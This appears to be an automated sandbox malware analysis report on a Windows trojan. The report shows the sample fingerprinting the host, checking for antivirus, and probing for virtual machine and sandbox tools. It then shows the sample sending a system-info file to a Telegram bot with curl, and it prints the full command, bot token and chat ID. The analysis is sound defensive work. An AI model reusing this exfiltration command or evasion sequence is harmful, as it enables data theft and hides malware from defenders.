
Windows Analysis Report
9KEZfGRjyK.exe

Overview

General Information

Sample name: 9KEZfGRjyK.exe (renamed because the original name is a hash value)
Original sample name: 73b0e64dcc0df2f2ac4d461245021e6a.exe
Analysis ID: 1578571
MD5: 73b0e64dcc0df2f2ac4d461245021e6a
SHA1: ff75ef00e33fb953964d6bbe1d86d5ad8bb8c9ba
SHA256: 99a4d0ac34848d665529220a0a04edd2753aba9ffe8434286967875d05643400
Tags: exe, user-meanjellybeanx

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Contains functionality to detect virtual machines
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • 9KEZfGRjyK.exe (PID: 7496 cmdline: "C:\Users\user\Desktop\9KEZfGRjyK.exe" MD5: 73B0E64DCC0DF2F2AC4D461245021E6A)
    • WMIC.exe (PID: 7512 cmdline: "wmic" bios get serialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7576 cmdline: "wmic" baseboard get serialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7640 cmdline: "wmic" cpu get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7736 cmdline: "wmic" computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7792 cmdline: "wmic" diskdrive get model,size MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7860 cmdline: "wmic" /namespace:\\root\SecurityCenter2 path AntivirusProduct get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • getmac.exe (PID: 7928 cmdline: "getmac" MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • systeminfo.exe (PID: 8048 cmdline: "systeminfo" MD5: EE309A9C61511E907D87B10EF226FDCD)
      • conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 8124 cmdline: "tasklist" /m sbiedll.dll MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 8184 cmdline: "tasklist" /m dbghelp.dll MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 7280 cmdline: "tasklist" /m api_log.dll MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 3104 cmdline: "tasklist" /m dir_watch.dll MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 3844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 5928 cmdline: "tasklist" /m pstorec.dll MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 2496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 3756 cmdline: "tasklist" /m vmcheck.dll MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 2492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 3992 cmdline: "tasklist" /m wpespy.dll MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7312 cmdline: "wmic" computersystem get model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 7512 cmdline: "tasklist" /fi "IMAGENAME eq vmtoolsd.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 7580 cmdline: "tasklist" /fi "IMAGENAME eq vboxservice.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 7688 cmdline: "tasklist" /fi "IMAGENAME eq vboxtray.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7772 cmdline: "wmic" csproduct get identifyingnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • curl.exe (PID: 5740 cmdline: "curl" -k -F chat_id=-4193710271 -F document=@system_info.txt;filename=284330-4180-1.log https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • conhost.exe (PID: 1748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched


AV Detection

Source: 9KEZfGRjyK.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7F410CBF0 BCryptGenRandom,SystemFunction036,BCryptGenRandom,SystemFunction036 | 0_2_00007FF7F410CBF0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: 9KEZfGRjyK.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string | data.pdb source: 9KEZfGRjyK.exe
Source: Binary string | data.pdb)444 source: 9KEZfGRjyK.exe
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7F411EB20 CloseHandle,FindFirstFileW,FindClose | 0_2_00007FF7F411EB20

Networking

Source: unknown | DNS query: name: api.telegram.org
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected:
    POST /bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument HTTP/1.1
    Host: api.telegram.org
    User-Agent: curl/7.83.1
    Accept: */*
    Content-Length: 3664
    Content-Type: multipart/form-data; boundary=------------------------edbae48fbd31f91b
Source: curl.exe, 0000002D.00000002.2423255293.00000265942E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument
Source: curl.exe, 0000002D.00000002.2423334465.00000265942FF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2422919071.00000265942FD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2422937156.00000265942FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument&
Source: curl.exe, 0000002D.00000002.2423255293.00000265942E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentC:
Source: curl.exe, 0000002D.00000002.2423296304.00000265942FD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2422964793.00000265942FD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2422919071.00000265942FD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentapi.telegram.
Source: curl.exe, 0000002D.00000002.2423255293.00000265942E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentc
Source: 9KEZfGRjyK.exe, 00000000.00000002.2423573230.000002AC2CAFC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4o
Source: 9KEZfGRjyK.exe, 00000000.00000002.2423573230.000002AC2CAFC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4o.txt9
Source: 9KEZfGRjyK.exe | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown | Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49770 version: TLS 1.2

System Summary

Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7F411F200 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError | 0_2_00007FF7F411F200
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7F411F0E0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError | 0_2_00007FF7F411F0E0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7F4102720 | 0_2_00007FF7F4102720
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7F41218F0 | 0_2_00007FF7F41218F0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7F411FDF0 | 0_2_00007FF7F411FDF0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7F4127520 | 0_2_00007FF7F4127520
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7F4101810 | 0_2_00007FF7F4101810
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7F4131140 | 0_2_00007FF7F4131140
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7F4117130 | 0_2_00007FF7F4117130
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7F41323B0 | 0_2_00007FF7F41323B0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7F413EF00 | 0_2_00007FF7F413EF00
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7F412D000 | 0_2_00007FF7F412D000
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7F4136080 | 0_2_00007FF7F4136080
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7F411E060 | 0_2_00007FF7F411E060
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7F4133930 | 0_2_00007FF7F4133930
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7F4135A90 | 0_2_00007FF7F4135A90
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7F4129AF0 | 0_2_00007FF7F4129AF0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7F411BB60 | 0_2_00007FF7F411BB60
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7F4132C20 | 0_2_00007FF7F4132C20
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7F4136CA0 | 0_2_00007FF7F4136CA0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7F410FCF0 | 0_2_00007FF7F410FCF0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: String function: 00007FF7F41353F0 appears 61 times
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: String function: 00007FF7F410F4E0 appears 69 times
Source: system_info.txt.0.dr | Binary string: EC-F4-BB-EA-15-88 \Device\Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: system_info.txt.0.dr | Binary string: Boot Device: \Device\HarddiskVolume1
Source: classification engine | Classification label: mal68.troj.evad.winEXE@64/2@1/2
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7F411F330 GetModuleHandleW,FormatMessageW,GetLastError | 0_2_00007FF7F411F330
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | File created: C:\Users\user\Desktop\system_info.txt
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7868:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7520:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7936:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2492:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2496:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3844:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1748:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7284:120:WilError_03
Source: 9KEZfGRjyK.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE'
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE'
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXSERVICE.EXE'
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXTRAY.EXE'
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\9KEZfGRjyK.exe "C:\Users\user\Desktop\9KEZfGRjyK.exe"
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" bios get serialnumber
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" baseboard get serialnumber
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" cpu get name
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" computersystem get totalphysicalmemory
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" diskdrive get model,size
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" /namespace:\\root\SecurityCenter2 path AntivirusProduct get displayName
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\getmac.exe "getmac"
Source: C:\Windows\System32\getmac.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\systeminfo.exe "systeminfo"
Source: C:\Windows\System32\systeminfo.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /m sbiedll.dll
Source: C:\Windows\System32\tasklist.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /m dbghelp.dll
Source: C:\Windows\System32\tasklist.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /m api_log.dll
Source: C:\Windows\System32\tasklist.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /m dir_watch.dll
Source: C:\Windows\System32\tasklist.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /m pstorec.dll
Source: C:\Windows\System32\tasklist.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /m vmcheck.dll
Source: C:\Windows\System32\tasklist.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /m wpespy.dll
Source: C:\Windows\System32\tasklist.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" computersystem get model
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /fi "IMAGENAME eq vmtoolsd.exe"
Source: C:\Windows\System32\tasklist.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /fi "IMAGENAME eq vboxservice.exe"
Source: C:\Windows\System32\tasklist.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /fi "IMAGENAME eq vboxtray.exe"
Source: C:\Windows\System32\tasklist.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" csproduct get identifyingnumber
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\curl.exe "curl" -k -F chat_id=-4193710271 -F document=@system_info.txt;filename=284330-4180-1.log https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument
Source: C:\Windows\System32\curl.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" bios get serialnumber
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" baseboard get serialnumber
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" cpu get name
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" computersystem get totalphysicalmemory
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" diskdrive get model,size
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" /namespace:\\root\SecurityCenter2 path AntivirusProduct get displayName
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\getmac.exe "getmac"
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\systeminfo.exe "systeminfo"
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /m sbiedll.dll
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /m dbghelp.dll
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /m api_log.dll
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /m dir_watch.dll
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /m pstorec.dll
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /m vmcheck.dll
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /m wpespy.dll
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" computersystem get model
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" bios get serialnumber
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /fi "IMAGENAME eq vboxservice.exe"
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /fi "IMAGENAME eq vboxtray.exe"
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" csproduct get identifyingnumber
